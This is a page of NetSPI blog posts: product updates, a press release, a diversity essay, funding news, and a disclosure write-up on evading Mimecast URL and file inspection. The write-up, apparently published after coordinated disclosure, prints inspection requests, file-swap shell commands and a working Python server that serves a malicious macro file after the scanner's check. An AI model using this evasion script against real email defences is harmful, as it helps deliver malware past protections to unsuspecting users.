
NetSPI Attack Surface Management Updates: Portfolio Dashboard & Perceptual Hashing

Hackers are highly motivated and incentivized to find new ways to gain access to your systems, expose your information, or even target your customers. To deliver the highest level of security and maintain a leadership position in the global offensive security space, NetSPI continues to invest in new technology, updated service capabilities, and the highest-quality teams. 

“On average, attack surface management tools initially discover 30% more cloud assets than security and IT teams even know they have,” according to Forrester’s Find And Cover Your Assets With Attack Surface Management report. Some tools even discovered several hundred percent more assets than teams originally knew about. 

Top use cases for attack surface management technologies are asset discovery and inventory, supply chain and third-party risk management, M&A due diligence, and compliance management. NetSPI’s Attack Surface Management (ASM) development team recognized these common use cases and saw the need to categorize and sort information faster, easier, and in a more intelligent way.  

The IT and SOC teams we work with are not simply looking for more data – they are looking for more meaningful and actionable data, and our recent developments have been targeted towards that.  

As a result, we are proud to introduce two new features into NetSPI’s ASM solution: the Portfolio Dashboard and Perceptual Hashing.

The Portfolio Dashboard


The Portfolio Dashboard is, simply put, a dashboard. This dashboard allows your company a global risk view of your attack surface, specifically showing your corporate network along with all portfolio or client networks. We’ve seen the most benefit from this feature in companies going through M&A processes, private equity firms, cyber insurance companies, parent companies, and conglomerates, along with many others. 

Organizations using ASM can now search and filter for a specific threat or technology within their entire portfolio. This enables them to clearly display the specific assets that have potential vulnerabilities and provide actionable information in seconds. 

A well-known example where NetSPI’s ASM Portfolio Dashboard would have proven valuable is Log4Shell. Log4Shell is a remote code execution vulnerability in Apache Log4j that allowed attackers to place malware on a targeted system, leading to the potential of a completely compromised network, theft of sensitive information, and more. 

Not good! 

In this example, non-portfolio companies were struggling to identify all affected assets within their network. Portfolio companies and cyber-insurance companies needed to not only identify assets within their own network, but they also needed to identify affected assets in their clients’ networks – searching every known potentially vulnerable asset to better understand their risk, while still missing every unknown asset. 

Again, not good! 

If the Log4j crisis happened today, however, companies could leverage NetSPI’s ASM Portfolio Dashboard to quickly and easily search for any affected device across their global attack surface. The potentially vulnerable assets would be displayed in a simple dashboard (as seen in the screenshot above), allowing IT and security teams to react accordingly, efficiently target the most vulnerable areas, and potentially save the company and its customers from catastrophic damage.  

This is just one example of how the portfolio dashboard can benefit companies today. Although many organizations have remediated Log4Shell today, this feature can help in much the same way with other threats or technologies that may arise tomorrow, next week, or in the future. 

Perceptual Hashing


NetSPI’s current ASM offering routinely takes screenshots of all websites on your global attack surface. And we’re excited to share that the platform now includes Perceptual Hashing.  

Perceptual Hashing, sometimes referred to as Perceptual Image Hashing or Perceptual Sorting, analyzes these screenshots and categorizes them based on similar looks, styles, layouts, and images. These groups of screenshots are then reviewed by NetSPI’s ASM Operations Team to identify trends in your network or find outliers of websites running on your perimeter, and then notify your team. 

There are other types of hashing, such as average hashing, cryptographic hashing, and geometric hashing; perceptual hashing, however, is the most effective in cybersecurity because it is designed to recognize and group similar items even when minor modifications such as compression or brightness changes are made to the images. As a result, images that are similar are grouped together, while outliers are detected and grouped separately.  

The intention is that if there is a vulnerability found on one of your public facing websites, Perceptual Hashing will allow you to search for similar webpages so you can review and take action. With NetSPI’s ASM continuous penetration testing capabilities and real-time reporting, teams will know if there are any publicly exposed management interfaces almost instantly and can respond accordingly. 

One of NetSPI’s ASM clients, a Fortune 500 technology company, recently used Perceptual Hashing to efficiently identify a vulnerability across various servers. The ASM Operations Team discovered a publicly exposed management interface in a proprietary web application during a routine scan, which left them vulnerable to external unauthenticated users accessing administrative functionality. The ASM team was able to take this finding and search the entirety of their other websites with the equivalent perceptual hash, identifying multiple other vulnerable servers. Once all were searched and the vulnerabilities were discovered, the team was able to report back to the company and guide them to remediate accordingly. 
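To make the grouping concrete, here is an added example (not NetSPI’s code; the post does not describe the platform’s actual algorithm) of a difference hash, one member of the perceptual-hash family: each constructed stand-in “screenshot” is shrunk to 9x8 grey blocks, the brighter-than-right-neighbour relation between adjacent blocks gives 64 bits, and the Hamming distance between hashes drives a greedy grouping. The brightened and noise-added copies land in the same group as the original while a different layout is an outlier.

```python
# Added example: a difference hash (dHash), one member of the perceptual hash
# family. Not NetSPI's implementation; the ASM platform's exact algorithm is
# not described in the post. Images are plain lists of rows of grey values
# (0-255) so the example runs without any imaging library.

HASH_W, HASH_H = 9, 8  # 9 columns give 8 comparisons per row -> 8 x 8 = 64 bits


def downscale(image, width=HASH_W, height=HASH_H):
    """Shrink an image to width x height by averaging each source block.

    Averaging (rather than sampling single pixels) is what makes the hash
    tolerant of compression noise and small pixel-level changes.
    """
    src_h, src_w = len(image), len(image[0])
    out = []
    for ty in range(height):
        y0, y1 = ty * src_h // height, (ty + 1) * src_h // height
        row = []
        for tx in range(width):
            x0, x1 = tx * src_w // width, (tx + 1) * src_w // width
            block = [image[y][x] for y in range(y0, y1) for x in range(x0, x1)]
            row.append(sum(block) / len(block))
        out.append(row)
    return out


def dhash(image):
    """Return a 64-bit integer: a bit is set when a block is darker than its right neighbour."""
    bits = 0
    for row in downscale(image):
        for x in range(HASH_W - 1):
            bits = (bits << 1) | (1 if row[x] < row[x + 1] else 0)
    return bits


def hamming(a, b):
    """Number of differing bits; a small distance means visually similar images."""
    return bin(a ^ b).count("1")


def group_by_hash(named_hashes, threshold=10):
    """Greedy clustering: each image joins the first group within `threshold` bits.

    Mirrors the 'similar screenshots grouped, outliers separate' behaviour
    described in the post; the threshold value is an assumption for this toy.
    """
    groups = []  # list of (representative_hash, [names])
    for name, h in named_hashes:
        for rep, members in groups:
            if hamming(rep, h) <= threshold:
                members.append(name)
                break
        else:
            groups.append((h, [name]))
    return [members for _, members in groups]


# --- constructed stand-in 'screenshots' (36x32 greyscale) -----------------
W, H = 36, 32


def striped(offset=0, noise=False):
    """Vertical light/dark stripes, optionally brightened or with +-3 'compression' noise."""
    img = []
    for y in range(H):
        row = []
        for x in range(W):
            base = 200 if (x // 4) % 2 else 40
            if noise:
                base += (x * 5 + y * 13) % 7 - 3   # deterministic small perturbation
            row.append(min(255, base + offset))
        img.append(row)
    return img


def gradient():
    """A completely different layout: brightness rising from left to right."""
    return [[4 * x + 2 * y for x in range(W)] for y in range(H)]


def demo():
    """Hash the constructed images, measure distance to the first one, and cluster."""
    samples = [
        ("login_page", striped()),
        ("login_page_brighter", striped(offset=30)),
        ("login_page_jpeg", striped(noise=True)),
        ("status_page", gradient()),
    ]
    hashes = [(name, dhash(img)) for name, img in samples]
    return {
        "distances": {name: hamming(hashes[0][1], h) for name, h in hashes},
        "groups": group_by_hash(hashes),
    }


if __name__ == "__main__":
    result = demo()
    print(result["distances"])  # constructed inputs: stripes 0, 0, 0; gradient 32
    print(result["groups"])     # [['login_page', 'login_page_brighter', 'login_page_jpeg'], ['status_page']]
```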

Other cases where NetSPI’s Perceptual Hashing feature can be used are: 

  • Servers using specific landing pages or technologies 
  • Publicly exposed management interfaces 
  • Digital rights management 
  • Data deduplication 
  • Image searching 

These are just two examples of recent innovations added to NetSPI’s Attack Surface Management solution. Although Perceptual Hashing is my current favorite feature, there are many innovations in the works right now to continue delivering the highest quality security for customers with our technology driven, human delivered methodology. 

Other noteworthy updates to our ASM solution include: 

  • New intelligent search help – when users click on the search inputs, they are presented with helpful suggestions to deliver the best results. 
  • Users in the Domain, IP Address, and Port table views can now copy selected assets and port URLs to the clipboard. 
  • Users can add an attribution statement when adding assets. 
  • Domain and IP address exports have been updated to include ports and associated assets. 
  • Domains, Ports, and IP Addresses now have all associated screenshots available to view. 
  • When viewing the full details page for a Domain, you can now use the “Generate Report” button to get a summary report specifically for that domain. 
  • The main dashboard now shows you trends of all vulnerabilities on your attack surface over time, separated by severity. 
  • On the ASNs page, the ‘Scan for ASNs’ button now validates and updates existing ASN associations in addition to inserting newly identified ASNs. 
  • The Port Gallery has been converted to an Explore page with left-hand facet searches. 
  • SAML SSO now supports users from multiple domains. 
  • Ability to automatically transform invalid CIDR ranges when adding assets. 
  • New port intelligence, including status code, content type, content length, site title, JARM, and HTTP reachability. 

Additional updates can be found on the Attack Surface Management changelog: https://asm.netspi.com/guide/changelog/. 

To learn more about NetSPI’s Attack Surface Management, contact your rep or connect with us here.

This blog post is a part of our offensive security product update series. Stay tuned for additional innovations within Resolve (PTaaS), ASM (Attack Surface Management), and AttackSim (Breach and Attack Simulation).


NetSPI’s Patrick Sayler Earns Spot on Mimecast’s Security Researcher Wall of Fame for Email Defense Evasion

Patrick successfully bypassed Mimecast URL and file inspection features and worked with the email security company to remediate the issues.

Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced that Principal Security Consultant Patrick Sayler was recognized on Mimecast’s Security Researcher Wall of Fame for bypassing email defenses within Mimecast Targeted Threat Protection (TTP). 

Patrick was able to bypass the URL and file inspection features which could have allowed an adversary to serve a malicious file or URL after Mimecast had already deemed it secure. A full breakdown of the process and remediation steps taken can be found on the NetSPI technical blog.

Patrick uncovered the vulnerability during a hybrid breach and attack simulation and social engineering penetration testing engagement for one of NetSPI’s clients. He worked closely with the Mimecast Responsible Disclosure Team to remediate the core issues identified within the TTP platform:  

  • The file content was not served by Mimecast (Mimecast has committed to implementing a fix) 
  • File inspection followed a predictable pattern (This issue has been addressed) 
  • Results were stored by filename and shared (Addressed via risk-based caching on a continuous basis) 

“This is a great reminder of the vital importance of defense in depth,” said Patrick. “When a frontline technical control fails, do you have back up, layered defenses and policies in place to slow down adversaries and prevent incident escalation? Social engineering and breach and attack simulation assessments can help organizations answer this question with confidence.” 

To learn more about NetSPI’s responsible disclosures and vulnerability research, visit https://www.netspi.com/pentesting-team/.

About NetSPI  

NetSPI is the leader in enterprise penetration testing and attack surface management. Today, NetSPI offers the most comprehensive suite of offensive security solutions – attack surface management, penetration testing as a service, and breach and attack simulation. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, three of the five largest healthcare companies, the leading cloud providers, and many of the Fortune® 500. NetSPI, a KKR and Ten Eleven Ventures portfolio company, is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India. Follow NetSPI on Facebook, Twitter, and LinkedIn. 

Media Contacts: 
Tori Norris, NetSPI 
victoria.norris@netspi.com
(630) 258-0277  

Jessica Bettencourt, Inkhouse for NetSPI
netspi@inkhouse.com
(774) 451-5142 


Bypassing Mimecast URL and File Inspection

Mimecast Targeted Threat Protection (TTP) is a suite of email security tools designed to protect end users from phishing attacks. The URL Protection feature of this subscription can inspect links embedded in emails for malicious content. If a file is deemed safe, Mimecast will allow the user to retrieve it from the linked site. Files categorized as malicious are blocked and cannot be downloaded. 

Or so I thought.

TL;DR 

root@webserver:/var/www# ls 
malware.xls	not-malware.xls

root@webserver:/var/www# mv malware.xls not-malware.xls

During a hybrid breach and attack simulation and social engineering penetration test, I discovered a way to bypass Mimecast’s URL Protection and File Inspection features described above. 

Though, in the interest of transparency, I’m not sure I can claim that I discovered this issue. I would be surprised if this wasn’t already a known trick. Nevertheless, it was acknowledged by Mimecast and landed me a spot on their Security Researcher Wall of Fame.  

This is a great reminder of the importance of defense in depth strategies. In this instance, I was able to bypass, or evade, the email defense in place. When frontline security controls are bypassed, organizations must have back up, layered controls and policies in place to stop or slow down adversaries and prevent further incident escalation. 

I worked closely with Mimecast to responsibly disclose and remediate this issue. Let’s take a deeper look at the discovery and disclosure process. 

Workflow

Here’s what happens behind the scenes when an email containing links is sent to an inbox protected by Mimecast.  

We will use 2 different files in these examples: 

  • happy.xls – A nearly-empty spreadsheet which only contains text 
  • sad.xls – An Excel file containing a basic malicious macro 

Each will be served by a basic web server powered by the Python http.server module.

  1. The end-user receives an email containing links to retrieve your files. 
     Image: Screenshot of email with links
  2. Clicking one of the links will result in the HTTP requests below. These are issued directly from Mimecast and are the “inspection” part of “URL Protection.” Take note of the timestamps and unique header values, as we’ll revisit these later. 
     Image: Web server logs showing that TTP retrieved the file

Request 1 (Mimecast) 

GET /happy.xls HTTP/1.1 
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
sec-ch-ua: " Not;A Brand";v="99", "Google Chrome";v="97", "Chromium";v="97"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: january132022.com
Cache-Control: max-age=259200
Connection: keep-alive

Request 2 (Mimecast)

GET /happy.xls HTTP/1.1 
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate
Accept-Language: en-gb,en;q=0.5
x-client-ip: 163.172.240.97
x-real-ip: 163.172.240.97
x-client: 163.172.240.97
Host: january132022.com
Cache-Control: max-age=259200
Connection: close
  3. If the file is deemed safe, Mimecast will present the Download button. Clicking this will result in a final request to finally retrieve the file. This request will be issued from your client, not from Mimecast.
     Image: TTP classification

Request 3 (End User)

GET /happy.xls HTTP/1.1
Host: january132022.com
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
  4. However, if the file contents are found to be malicious, Mimecast Targeted Threat Protection will classify the file as harmful and prevent the user from accessing it. 
     Image: Web server logs showing that TTP retrieved the second file
     Image: TTP classification

The Problems 

Did anything in that process catch your eye? There are four core concerns I had with this process. Mimecast’s corresponding remediation steps for each of these problems can be found at the end of this article. 

1. File content is not served by Mimecast

After clicking the Download button, the end user will retrieve the file directly from the remote link.

2. A Predictable Pattern

HTTP requests generated by Mimecast file inspection follow a predictable pattern. In the workflow above, Requests 1 and 2 will always be issued in that exact order, in the same two-second interval, and with the shown header values.

This means that an attacker can accurately determine when a file has been inspected by TTP. By monitoring for the unique header values in Request 2 (i.e., x-client-ip, x-real-ip, x-client), the attacker can modify the subsequent response to Request 3 to return an entirely different set of file contents. This would allow an attacker to present a clean file to Mimecast, while serving malicious content to the end user.

These two items alone could compromise the integrity of inspection results. Though there’s a much simpler way to achieve the same result.

3. Results are Stored by Filename

That’s right! URLs are only inspected during their first visit by that user. If a URL is previously designated as safe, the content and classification will remain cached for a length of time. An attacker can bypass protections by simply renaming a malicious file to match the filename of a previously categorized safe file. This result remained for up to four hours in my testing; however, Mimecast has shared with me that they will look to address this via risk-based caching.

4. Results are Shared

While you can’t see it in the above screenshots, I found that links rewritten by TTP do not appear to be completely unique. Inspections, and their resulting categories, are seemingly persistent across identical messages sent from two different source addresses. An attacker could send a benign message to the target from Address A, then re-send the same message from Address B after the file has been categorized.

The Problems Combined

Let’s put everything together. To demonstrate the attack workflow, the examples below will pick up immediately after I attempted to click the Blocked file. 

  1. On the remote web server, rename the malicious file to match the filename of the safe file. Review the checksum to confirm that the file matches. 
# sha256sum happy.xls                          
87762ea8f248335b92bbadf71396305d2090537401d51d6a55df6754e74c2e25  happy.xls 

# sha256sum sad.xls 
131f2276d2003b22d51a8817817edd5ab2dcbb9b0b487f5149717e034d2b67e7  sad.xls 

# cp happy.xls backup_happy.xls 

# cp sad.xls happy.xls 

# sha256sum sad.xls 
131f2276d2003b22d51a8817817edd5ab2dcbb9b0b487f5149717e034d2b67e7  sad.xls 

# sha256sum happy.xls 
131f2276d2003b22d51a8817817edd5ab2dcbb9b0b487f5149717e034d2b67e7  happy.xls 

# ls
backup_happy.xls  happy.xls  nocachebasicweb.py  sad.xls

     Image: Renaming the malicious file to replace the safe file

  2. Return to the email and click the link to the safe file, which now hosts the contents of the malicious file. Review the web server logs and observe that Mimecast does not attempt to inspect the file a second time, resulting in the malicious file being classified as safe. Downloading and reviewing the file confirms that the malicious content was successfully downloaded. 
     Image: TTP incorrect classification
     Image: Web server logs showing that TTP did not inspect the file, and that it can be downloaded

TTPs against TTP

While you can certainly follow the “steps” outlined in the TL;DR, I think we can make this better. 

Proof-of-Concept 1: Automatic File Renaming

The Python script below will start a web server on the host and automatically rename a malicious file to an inspected, safe filename. Note that the below code is a basic example and will only function a single time. It is not clean, but it certainly does the job. 

Code: 

# NoCacheHTTPServer.py
# Made from https://stackoverflow.com/questions/42341039/remove-cache-in-a-python-http-server
import os
import http.server

PORT = 80
count = 1  # responses sent so far; starts at 1, so the first response makes it 2

class NoCacheHTTPRequestHandler(
    http.server.SimpleHTTPRequestHandler
):
    def send_response_only(self, code, message=None):
        # Send the status line, then add headers that stop any intermediate
        # cache from serving a stale copy of the file.
        super().send_response_only(code, message)
        self.send_header('Cache-Control', 'no-store, must-revalidate')
        self.send_header('Expires', '0')

        # Count responses: the first two correspond to Requests 1 and 2
        # in the workflow above.
        global count
        count = count + 1

        if count == 2:
            print('[*] MIMECAST SCAN 1')

        elif count == 3:
            print('[*] MIMECAST SCAN 2')
            print('[**] MIMECAST SCAN COMPLETE. REPLACING FILE.')
            # Swap the files once; the script does not reset after this.
            os.rename('thisfileissafe.xls', 'thisfileissafe.xls.bak')
            os.rename('virus.xls', 'thisfileissafe.xls')

if __name__ == '__main__':
    http.server.test(
        HandlerClass=NoCacheHTTPRequestHandler,
        port=PORT
    )

Proof-of-Concept 2: Automatic TTP Evasion

This one will start a web server on the host and serve safe content by default. It reviews each incoming request for the unique HTTP request headers provided by Mimecast URL Protection (x-client, x-client-ip, and x-real-ip). If these headers are detected, it will then automatically alter the response to the subsequent request and serve malicious content, then reset to safe content afterwards.  

This process will repeat each time the TTP headers are detected. This allows the attacker to evade future detections while continuing to deliver malicious content to additional victims. And just for good measure, the victim IP can be hardcoded to always serve the payload when they visit. 

The code for this proof of concept can be found on GitHub: https://github.com/psayler/MrMimecast

Lingering Questions

This was discovered during an active engagement, so I was not in a position to review every single edge case. These are questions that I asked myself but was unable to answer.  

  • Are rewritten URLs shared across email accounts within the organization?
  • Are rewritten URLs shared across accounts in separate Mimecast tenants?
    • Ex: attacker@example.com sends an email to patrick@netspi.com and steve@competitor.com. If Patrick clicks the link and causes the URL to be categorized, will that carry over to Steve’s link as well? 
    • If results are shared, an attacker could potentially pre-inspect and categorize files by sending messages to their own Mimecast subscription. 
  • How long is the scan result cached? My estimates were around 4 hours. This makes attacks somewhat time-sensitive, but still leaves a large window of opportunity. 

Recommendation to Mimecast

Users should be unable to retrieve an inspected file directly from the remote host. Instead, TTP should act as an intermediary and temporarily store a copy of the inspected file to serve to the user. This would address all of the demonstrated evasion methods. Future download attempts by the user should be served from TTP – either the previously cached version or a newly inspected copy. 
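As an added illustration of Problem 3 and of this recommendation (a constructed model, not Mimecast’s or NetSPI’s code; the file contents, the scanner stand-in and the four-hour window are assumptions), the toy below places the described behaviour, a verdict cached per URL with the user fetching from the origin, beside a gateway that stores and serves the inspected bytes and re-inspects once the window expires.

```python
# Added example, not Mimecast's or NetSPI's code: a toy model of the inspection
# flow described in this post. The original behaviour (verdict cached per URL,
# user downloads from the origin) is placed beside the recommended design
# (gateway stores the inspected bytes and serves them itself). File contents,
# the scanner stand-in and the cache window are constructed assumptions.


class Origin:
    """The remote web server (the attacker's host in the post). Files can be swapped."""

    def __init__(self, files):
        self.files = dict(files)
        self.requests = []                 # every fetch, like the web server logs above

    def get(self, path):
        self.requests.append(path)
        return self.files[path]


def inspect(content):
    """Stand-in scanner: flags a constructed macro marker. Real TTP logic is unknown."""
    return "malicious" if b"AutoOpen" in content else "safe"


class UrlKeyedGateway:
    """Original behaviour: inspect on first visit, remember the verdict by URL,
    then let the user download straight from the origin (Request 3 above)."""

    def __init__(self, origin):
        self.origin = origin
        self.verdicts = {}                 # url -> verdict; never expires in this toy

    def click(self, url, now):
        if url not in self.verdicts:       # only the first visit triggers inspection
            self.verdicts[url] = inspect(self.origin.get(url))
        if self.verdicts[url] != "safe":
            return None                    # blocked page
        return self.origin.get(url)        # user gets whatever the origin serves *now*


class ContentServingGateway:
    """Recommended design: fetch, inspect, store the bytes and serve the stored copy.
    The user never contacts the origin, so a file swapped after inspection is never
    delivered; once the window expires the copy is fetched and inspected again."""

    def __init__(self, origin, ttl=4 * 3600):
        self.origin = origin
        self.ttl = ttl
        self.cache = {}                    # url -> (content, verdict, stored_at)

    def click(self, url, now):
        entry = self.cache.get(url)
        if entry is None or now - entry[2] >= self.ttl:
            content = self.origin.get(url)
            entry = (content, inspect(content), now)
            self.cache[url] = entry
        content, verdict, _ = entry
        return content if verdict == "safe" else None


HAPPY = b"happy.xls: text cells only"                  # constructed benign file
SAD = b"sad.xls: Sub AutoOpen() ... End Sub"          # constructed macro file


def replay(gateway_cls):
    """Replay the post's scenario: inspect the benign file, swap it at the origin
    ('cp sad.xls happy.xls'), then click the same link again inside and after the window."""
    origin = Origin({"/happy.xls": HAPPY, "/sad.xls": SAD})
    gateway = gateway_cls(origin)
    first = gateway.click("/happy.xls", now=0)          # inspected, deemed safe
    origin.files["/happy.xls"] = SAD                    # renamed malicious file
    second = gateway.click("/happy.xls", now=60)        # one minute later
    third = gateway.click("/happy.xls", now=5 * 3600)   # after the four-hour window
    return {"first": first, "second": second, "third": third,
            "origin_requests": list(origin.requests)}


if __name__ == "__main__":
    for cls in (UrlKeyedGateway, ContentServingGateway):
        print(cls.__name__, replay(cls))
```

With the URL-keyed model the second and third clicks deliver the swapped file; with the content-serving model the second click returns the stored benign copy and the third, after re-inspection, is blocked.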

Disclosure, Feedback, and Timeline 

Mimecast has indicated that they will be implementing these suggestions and provided the following comments:  

  1. File content is not served by Mimecast 
    Mimecast has committed to implementing a fix. 
  2. A Predictable Pattern 
    This issue has been addressed. 
  3. Results are Stored by Filename 
    Addressed via risk-based caching on a continuous basis. 
  4. Results are Shared 
    Addressed via risk-based caching on a continuous basis. 

Unfortunately, without an active Mimecast subscription, I have no way to confirm if this is accurate.  

Below is a timeline of the disclosure process: 

  • 1/23/2022
  • 1/23/2022 – 1/31/2022
    • Revisited the issue during an active engagement and noticed that the “x-client” headers were no longer present 
    • Follow-up message sent to Mimecast to confirm if any changes have already been made 
  • 2/4/2022
    • Mimecast acknowledges the initial disclosure 
  • 3/7/2022
    • Mimecast confirms they can reproduce the issue 
    • Mimecast states that their engineers are working on a fix, based on the provided remediation guidance 
  • 3/8/2022 – 3/18/2022
  • 5/11/2022
    • Mimecast indicates that the fix is intended to be implemented by the end of August 2022 
  • 8/30/2022
    • Mimecast confirms August 2022 remediation timeline 
  • 9/1/2022
    • Draft blog post shared with Mimecast for review 
  • 9/16/2022 – 10/18/2022
    • Blog post feedback received from Mimecast 
    • Content amended to include the above 

Tackling Diversity and Imposter Syndrome During Cybersecurity Awareness Month

Recent data indicates the cybersecurity industry continues to grapple with talent and skills gaps and the lack of diversity across its workforce. In fact, a recent survey from Boston Consulting Group revealed that 75% of cybersecurity workers are men, and in a recent survey from Heidrick & Struggles, only 14% of U.S. cyber leaders identified as women and/or people of color. Beyond this, for women, people of color, and entry-level or remote workers—imposter syndrome or feeling an inherent sense of otherness is not uncommon.  

As we amplify this year’s Cybersecurity Awareness Month theme, “See Yourself in Cyber”, which focuses on the people that make up the cybersecurity industry, it’s important to recognize what the industry can do to empower more people to see themselves in a cyber career. Here are a few steps we can take collectively to combat the issues surrounding imposter syndrome and diversity, and further progress as an industry. 

Overcoming Imposter Syndrome 

In order to “see yourself” you also must believe that you belong in cyber. When I first started my career in cybersecurity, I experienced a feeling that many of my other female peers have also experienced – that I needed to change to be “one of the guys.” 

Over time, I learned that my opinions and insights are just as valuable as those of my male peers. As such, I always make it a point to create safe spaces for employees to be themselves and feel empowered to advocate for themselves. Overcoming imposter syndrome requires reshaping your view of yourself and what makes you unique in a more positive light. Here are some techniques I’ve practiced to help me become more confident:  

  • Remember time is your biggest helper. As your confidence and knowledge grows in your position, things will get better. Remembering this can be helpful in and of itself. 
  • Take a step back. When you catch yourself playing the comparison game and losing, ask yourself, “am I really comparing apples to apples here?” Most of the time your answer will be “no.” Once you’ve gotten that more realistic perspective, it’s a lot easier to pull yourself out of a negative spiral and prevent the seeds of imposter syndrome from taking root. 
  • Know your own strengths and weaknesses. Having a more accurate self-image can help combat moments of imposter syndrome and can make it easier to set yourself up for success. If you have an over-inflated sense of some of your skills, you can be setting yourself up for failure. In the other direction, if you’re undervaluing your skills, that could cause you to pass on opportunities where you would’ve shined.  

Cultivating a Safe and Inclusive Culture 

Creating a culture where employees feel safe and empowered to do their best work is also essential in our industry. As an employer, it can help to ask the following questions:  

  • Do we encourage open feedback? 
    • Employees must feel empowered to let their teams/organization know what is and is not working for them. This will have a positive impact on work culture and overall productivity.  
  • Is self-care and mental health built into our culture? 
    • While employees must ultimately ensure they are creating a work-life balance for themselves, it’s difficult to do so without the support of a workplace that builds the concept of prioritizing mental health and self-care into their culture.  
  • Does our company culture inspire collectiveness? 
    • Creating spaces for human interaction can help everyone feel more connected, especially in a hybrid environment. At NetSPI, we have Slack channels dedicated to nearly every hobby and interest under the sun, and a “Kudos” channel for employees to call out their coworkers for a job well done. It’s a positive place for the entire organization to find community and celebrate together. This also reiterates that everything we do is a part of an ecosystem. 
  • Are we striving towards more diversity? 
    • Companies should have specific goals/initiatives to seek out diverse new hires. Consider implementing a Diversity, Equity, and Inclusion (DE&I) committee to both retain current diverse employees and reach out into the community. 
    • Every company should revisit their job descriptions and requirements, especially in the technical fields, to ensure they are inclusive of people that come from varying backgrounds. Focusing on hiring based on skillset allows us to open opportunities to those that will excel in the position that may have been prevented in the more traditional experienced-focused mindset. Ultimately, we must ask ourselves, “How do we make cybersecurity jobs more accessible to more people?” 

Championing More Diversity in Cybersecurity 

In order to achieve better growth and diversity in the cybersecurity workforce, more emphasis needs to be placed on the concept of variety in race, ethnicity, gender identity, and diversity of thought. This means developing a deeper understanding of the differences and experiences that shape people’s perspectives, and intentionally incorporating them into creative problem solving.  

When diversity is championed, it drives better culture, productivity, retention rates, and overall business success. Additionally, we can effectively reduce the “boys club” stigma commonly associated with the industry. Ultimately, this encourages more people to pursue cybersecurity-related education, leading to more diversity in the workforce.  

Furthermore, organizations must work together to provide more equitable learning, coaching and mentoring opportunities for talent new to the industry. At NetSPI, we are addressing this issue through NetSPI University, an extensive entry-level training program where candidates gain a baseline skill set to execute web application penetration testing and external network penetration testing, led by NetSPI’s expert pentesters.  

We have also started to partner with organizations such as WiCyS (Women in Cybersecurity) and Girls Hack Village whose purpose is to create a safe space for attendees to learn about cybersecurity and the challenges that women in the industry face.  

Most importantly, organizations must hold themselves accountable to take tangible steps towards more diversity. Beyond basic “check the box” hiring exercises, the question is: “How can cybersecurity leaders hold space and give credibility to varied voices and ideas?” As we take this month to reflect on ways in which we can move the cybersecurity industry forward, it’s imperative to remember that change starts with nurturing our people. 


eSecurity Planet: NetSPI Lands $410 Million in Funding – And Other Notable Cybersecurity Deals

On October 17, NetSPI CEO Aaron Shilts was featured in the eSecurity Planet article called NetSPI Lands $410 Million in Funding – And Other Notable Cybersecurity Deals. Read the preview below or view it online.

+++

NetSPI, a top penetration testing and vulnerability management company, recently announced a $410 million funding round, a huge amount in a year in which $100+ million rounds have become a rarity. The investor was KKR, one of the world’s largest alternative asset firms.

KKR previously invested $90 million in NetSPI in May 2021, so NetSPI has demonstrated considerable traction since then.

That the funding round occurred in a difficult environment makes it all the more impressive. According to data from Crunchbase, the total amount of investments in cybersecurity startups came to $2.6 billion in the third quarter. This was the lowest since the same period in 2020.

The number of deals for this year’s Q3 was only 124. This is a level not seen since 2014.

Filling the Cybersecurity Talent Gap

Of course, the drop-off has been widespread across the tech sector. With a bear market, high inflation, rising interest rates, and concerns of a recession, investors are certainly getting more conservative – and generally focusing on top-notch deals.

As for NetSPI, it fits into this sweet spot. Founded over 20 years ago, the company’s vision is “technology powered, human delivered.” This involves sophisticated penetration testing for some of the world’s largest financial institutions, cloud operators, and healthcare organizations.

For the past five years, revenues have spiked by 5X. Organic growth was 50% in 2021 and 61% thus far in 2022.

“We combine human ingenuity from our 400 global offensive security professionals with our innovative technology platforms – a unique combination that ensures quality, consistency, transparency, accountability, and efficiency across all NetSPI assessments,” said Aaron Shilts, CEO, NetSPI.

A key focus is on hiring top talent in ethical hacking and adversary simulation and leveraging NetSPI’s three technology platforms, which include Resolve, ASM, and AttackSim.

“Additionally, the scarcity of talent is still one of the biggest issues in the cybersecurity industry,” said Shilts. “Investors are aware of this and have become acutely focused on acquiring organizations with a concentration on hiring the best talent globally and who offer programs to fill the talent gap.”

NetSPI plans to use the capital for investing in R&D, hiring, and global expansion. Part of the money will also be to recapitalize the equity investment of an early investor, Sunstone Partners.

You can read the full article at eSecurity Planet!


Security Systems News: Inkhouse Virtual Media Panel on Diversity in Cybersecurity Touches on Key Insights

On October 14, NetSPI Managing Consultant Melissa Miller was featured in the Security Systems News article called Inkhouse Virtual Media Panel on Diversity in Cybersecurity Touches on Key Insights. Read the preview below or view it online.

+++

YARMOUTH, Maine – The tech industry and cybersecurity field remain, for the moment, an old boys club; however, a group of leading women in security and human resources came together this week to discuss strengthening the industry through diversity.

